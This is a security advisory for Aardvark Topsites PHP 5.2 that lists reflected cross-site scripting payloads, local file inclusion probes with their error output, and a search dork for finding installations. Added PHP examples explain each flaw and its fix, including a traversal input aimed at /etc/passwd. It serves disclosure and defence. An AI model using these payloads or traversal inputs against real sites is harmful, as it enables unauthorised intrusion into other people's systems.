Aardvark Topsites PHP version 5.2 suffers from cross-site scripting and local file inclusion vulnerabilities.
940d50ace752c918217ecd81375f23ada65a4665f733eae8033d9b8298efa90c
Aardvark Topsites PHP 5.2 Multiple Vulnerabilities
==================================================
Author : indoushka
Vendor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/
Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1
======================================
Cross-site scripting (verified) :
This vulnerability affects /rank/index.php.
Attack details :
URL-encoded GET input q was set to 1" onmouseover=prompt(999881) bad="
The input is reflected inside a tag attribute between double quotes.
URL-encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad="
The input is reflected inside a tag attribute between double quotes.
URL-encoded POST input title was set to Mr." onmouseover=prompt(903995) bad="
The input is reflected inside a tag attribute between double quotes.
URL-encoded POST input u was set to 1" onmouseover=prompt(986160) bad="
The input is reflected inside a tag attribute between double quotes.
URL-encoded POST input url was set to #" onmouseover=prompt(915056) //
The input is reflected inside a tag attribute between double quotes.
In every case the double quote inside the payload terminates the attribute value, so onmouseover=prompt(...) is parsed as a new event-handler attribute on the same tag, and the trailing bad=" or // consumes the page's original closing quote. The prompt() fires when the element is moused over. The fix is to HTML-encode the value before it is placed in an attribute (htmlspecialchars() with ENT_QUOTES), which turns the embedded quote into &quot; and keeps the whole payload inside the attribute value.
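The attribute-context reflection described above, reconstructed as an added example (this is not code from Aardvark Topsites PHP; the field name q and the surrounding form markup are assumptions):

```php
<?php
// Added example, not Aardvark Topsites PHP code: reconstructs the advisory's
// "reflected inside a tag attribute between double quotes" pattern and the fix.
// The field name "q" and the <input> markup are assumptions.

function render_vulnerable(string $q): string
{
    // Raw input lands inside a double-quoted attribute value.
    return '<input type="text" name="q" value="' . $q . '">';
}

function render_fixed(string $q): string
{
    // ENT_QUOTES encodes both " and ' so the input cannot terminate the
    // attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="q" value="' . $safe . '">';
}

// The q payload from the advisory, as PHP sees it after URL decoding.
$payload = '1" onmouseover=prompt(999881) bad="';

echo render_vulnerable($payload), PHP_EOL;
echo render_fixed($payload), PHP_EOL;
```

In the vulnerable output the quote after `1` closes the value attribute and `onmouseover=prompt(999881)` becomes an attribute of the input element, with `bad=""` soaking up the original closing quote. In the fixed output both quotes are emitted as `&quot;`, so the browser treats the entire payload as the field's value. Encoding is the right fix for the email, title and u fields too; for the url field, which is reflected into a link-style attribute, encoding stops the attribute break-out but a `javascript:` scheme would still execute on click, so that value also needs a scheme allowlist (http/https) before it is emitted.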
Local file inclusion :
URL-encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'
URL-encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'
The error messages show that l and sql are concatenated between a fixed directory prefix ('../languages/' and '../sources/sql/') and a '.php' suffix before being passed to require. Because of the prefix the remote URL is never fetched, so this is local rather than remote file inclusion: an attacker can use ../ traversal in l or sql to include any .php file the web server can read. The literal %00 in the reported path shows the null byte did not truncate the .php suffix in this test, so the target must end in .php. The fix is to validate the value against a strict allowlist of known language and SQL driver names, or at minimum confirm the resolved path stays inside the intended directory, rather than concatenating user input into require.
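The include-path concatenation implied by the error messages above, with an allowlisted replacement, as an added example (this is not Aardvark Topsites PHP's own code; the languages directory, the english.php file and the sample inputs are constructed for the demonstration, and the same check applies to the sql parameter with its '../sources/sql/' prefix):

```php
<?php
// Added example, not Aardvark Topsites PHP code. language_path_vulnerable()
// mirrors the '../languages/' . $l . '.php' concatenation the advisory's
// error message implies; language_path_fixed() allowlists the name and checks
// the resolved path. The temporary directory and english.php are constructed
// fixtures so the script runs stand-alone.

function language_path_vulnerable(string $l): string
{
    // Fixed prefix and suffix with user input in between: a value such as
    // ../../foo reaches foo.php anywhere the web server can read.
    return '../languages/' . $l . '.php';
}

function language_path_fixed(string $l, string $languages_dir): ?string
{
    // 1. Only short lowercase identifiers are acceptable language names.
    if (preg_match('/^[a-z]{2,16}$/', $l) !== 1) {
        return null;
    }
    // 2. The file must exist and resolve to a location inside $languages_dir,
    //    which also defeats symlinks and traversal that survived step 1.
    $base = realpath($languages_dir);
    $file = realpath($languages_dir . DIRECTORY_SEPARATOR . $l . '.php');
    if ($base === false || $file === false) {
        return null;
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;   // safe to pass to require
}

// Constructed fixture: a temporary languages directory holding one real file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'languages_' . uniqid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'english.php', "<?php\n");

$inputs = [
    'english',                                       // legitimate value
    '../../../../etc/passwd',                        // traversal attempt
    'http://some-inexistent-website.acu/x?%00.jpg',  // the advisory's probe
];
foreach ($inputs as $l) {
    printf("%-46s vulnerable: %s\n", $l, language_path_vulnerable($l));
    printf("%-46s fixed:      %s\n", $l, language_path_fixed($l, $dir) ?? 'rejected');
}

unlink($dir . DIRECTORY_SEPARATOR . 'english.php');
rmdir($dir);
```

Running it shows the vulnerable function happily producing '../languages/../../../../etc/passwd.php' and the advisory's own probe path, while the fixed function returns the real path only for english and rejects everything else before require is ever reached. The appended .php suffix is what limits the vulnerable version to .php targets on PHP builds that do not truncate paths at a null byte; the identifier check in the fixed version makes that question irrelevant.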